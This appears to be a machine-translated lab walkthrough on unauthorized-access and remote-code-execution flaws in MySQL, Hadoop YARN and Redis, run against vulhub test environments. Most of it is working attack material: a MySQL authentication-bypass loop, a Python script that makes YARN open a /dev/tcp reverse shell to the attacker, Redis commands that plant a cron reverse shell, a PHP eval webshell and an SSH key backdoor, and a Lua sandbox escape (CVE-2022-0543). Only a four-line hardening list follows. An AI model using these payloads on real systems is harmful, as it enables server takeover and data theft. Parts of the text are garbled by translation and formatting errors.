Directory
- Database Security – & amp;Redis & amp;Hadoop & amp;Mysql & amp;Unauthorized Access & amp;RCE
-
- definition
- Vulnerability recurrence
-
- Mysql-CVE-2012-2122 vulnerability
- Hadoop – Improper Configuration Unauthorized Trio & RCE Vulnerability
- Redis-Unauthorized Access-Webshell &Task &Key&RCE, etc.
-
- Vulnerability definition:
- Vulnerability causes
- Vulnerability hazards
- Vulnerability recurrence
-
- Redis-Unauthorized Access-Webshell & Scheduled Tasks &Keys &RCE
- redis command execution (RCE)
- redis sandbox bypass (CVE-2022-0543)
- Reinforce ideas
Database Security – & amp;Redis & amp;Hadoop & amp;Mysql & amp;Unauthorized Access & amp;RCE
Definition
Unauthorized access vulnerabilities can be understood as flaws in addresses and authorization pages that require security configuration or permission authentication, allowing other users to directly access, thereby causing important permissions to be operated, and sensitive information such as databases or website directories to be leaked, including common unauthorized pages of ports. Unauthorized /admin.php /menu.php
Common unauthorized access vulnerabilities and default ports:
Default port statistics:[21, 139, 873, 2049, 2181, 2182, 2375, 5601, 5672, 5900, 5901, 5984, 6379, 6443, 8080, 8088,
8095, 8161, 9100, 9200, 9300, 11211, 15672, 15692, 20048, 25672, 27017] Wait
Vulnerability recurrence
Mysql-CVE-2012-2122 vulnerability
Shooting range environment: vulhub
Open the environment and execute the payload:
Through the loop, login requests are continuously sent:
for i in `seq 1 1000`; do mysql -uroot -pwrong -h you-ip -P3306; done
After execution and waiting, it will directly enter the database:
Successful entry:
Hadoop-Improper Configuration Unauthorized Trio &RCE Vulnerability
Shooting range environment: vulhub
Open the environment:
payload:
#!/usr/bin/env python import requests target = 'http://192.168.100.134:8088/' lhost = '192.168.100.1' # put your local host ip here, and listen at port 9999 url = target + 'ws/v1/cluster/apps/new-application' resp = requests.post(url) app_id = resp.json()['application-id'] url = target + 'ws/v1/cluster/apps' data = {<!-- --> 'application-id': app_id, 'application-name': 'get-shell', 'am-container-spec': {<!-- --> 'commands': {<!-- --> 'command': '/bin/bash -i > & amp; /dev/tcp/%s/9999 0> & amp;1' % lhost, }, }, 'application-type': 'YARN', } requests.post(url, json=data)
Turn on listening on the attack side:
nc -lvvp 9999
Execute python script:
successful rebound
Executable commands:
Redis-Unauthorized Access-Webshell & amp;Task & amp;Key & amp;RCE, etc.
Redis is a very fast, open source, network-enabled, memory-based and persistent log-type, non-relational database;
Provides APIs in multiple languages, java/c/c++/c#/php/javascript/
Vulnerability definition:
The redis unauthorized access vulnerability is a vulnerability caused by the domain redis server having an earlier version and not setting a login password. The attacker can directly use the IP address and port of the redis server to complete the remote login of the redis server and complete subsequent control and control of the target server. use.
Cause of vulnerability
1.redis version 4.x/5.0.5 or previous versions
2.Redis is bound to 0.0.0.0:6379, and no firewall rules have been added to prevent other Fetion source IP access and other related security policies from being directly exposed to the public network.
3. If password authentication is not set (usually empty), you can remotely log in to the redis service without a password.
Vulnerability hazard
The attacker can use the redis command to write a scheduled task to the target server to rebound the shell and complete the control of the server. The attacker can use the redis command to write a webshell to the website directory to complete the initial control of the target website server. The most serious problem is that if redis is used as root When running, the hacker can write the SSH public key file to the root account and log in to the victim server directly through SSH.
Vulnerability Recurrence
Redis-Unauthorized Access-Webshell & amp; Scheduled Task & amp;Key & amp;RCE
Vulnerability verification:
Verification ideas:
The essence of the unauthorized access vulnerability is that the server login can be completed without a user password, so the verification idea is very simple. As long as the attack machine can be used to log in to the target server without a password, the vulnerability exists.
On the server side, start the redis service
Attack machine: redis-cli -h IP connects to the redis server
After logging in, enter info, and the content will appear to prove that the verification is successful.
Exploit:
How to exploit the vulnerability 1. Write scheduled task rebound shell Utilization process Goal: run redis server Attack: Connect to redis server Use the attack machine to write planned tasks into the server config set dir /var/spool/cron //Writing directory plan folder config set dbfilename root //The file name to be written, you can customize the name set ssr "\\ \\ */1****/bin/bash -i > & amp; /dev/tcp/attackIP/1234 0> & amp;1\\ \\ " //Written content save //save Attack aircraft: Execute nc -lvvp 1234 and wait for a moment. The hacker machine receives the shell of the target machine. Use crontab -l to view the scheduled tasks originally written by the target machine 2. Write webshell config set dir /var/www/html config set dbfilename shell.php set webshell "<?php @eval($_POST['cmd']); ?>" //webshell backdoor save 3. Write SSH public key to log in 1) Open the SSH service on the attack machine and target machine Command: systemctl start ssh (if not, use apt command to install or yum to install) 2) Create an SSH public key writable directory on the target machine Command: mkdir /root/.ssh //ls -al to check whether the creation is successful 3) Clear the files in the /root/.ssh directory of the attacking machine to facilitate the identification of the SSH public key files that will be generated and stored in it later. Command: rm -rf * 4) Generate the SSH public key on the attacking machine (you need to hit Enter three times in succession) Command: ssh-keygen -t rsa 5) Switch to the public key storage directory on the attacking machine: Command: cd /root/.ssh 6) Write the public key to 1.txt (use \\ before and after to avoid mixing with other cached data in redis, otherwise it will always fail) (echo -e "\\ \\ ";cat id_rsa.pub;echo -e"\\ \\ ") > 1.txt Bring the text content of 1.txt into the process of logging in to the target redis server. You can then directly set the target file on the target machine and write it. Order: cat 1.txt | redis-cli -h target IP -x set crack //Set the content of 1.txt to crack (the name of the setting), and you can customize the name Use redis-cli -h target IP to connect to the target machine and execute the following command to write the local SSH public key to the target machine. config set dir /root/.ssh config get dir config set dbfilename authorized_keys save Use ssh to log in without a password on the attack machine cd /root/.ssh ssh -i id_rsa root@targetIP
redis command execution (RCE)
Shooting range environment: vulhub
Open the environment and enter verification, enter info and execute, indicating that there is unauthorized:
Automation tools use:
Use directly, dry directly
Tool address
payload: python3 redis-master.py -r target-ip -p 6379 -L local-ip -P 8888 -f RedisModulesSDK/exp.so -c "id" python3 redis-master.py -r target-ip -p 6379 -L local-ip -P 8888 -f RedisModulesSDK/exp.so -c "whoami" //You can also replace the command with a rebound shell command to perform rebound.
Results of the:
Try another command again:
whoami
Command executed successfully.
You can also change the command to a rebound shell command to perform a rebound.
redis sandbox bypass (CVE-2022-0543)
Shooting range environment: vulhub
Open the environment
payload: eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0 eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("whoami", "r"); local res = f:read("*a"); f:close(); return res' 0 //You can also switch to the rebound shell command to perform a rebound
Results of the:
Reinforcement ideas
1.Upgrade
2. Modify 6379
3. Set up password authentication
4. Set up a firewall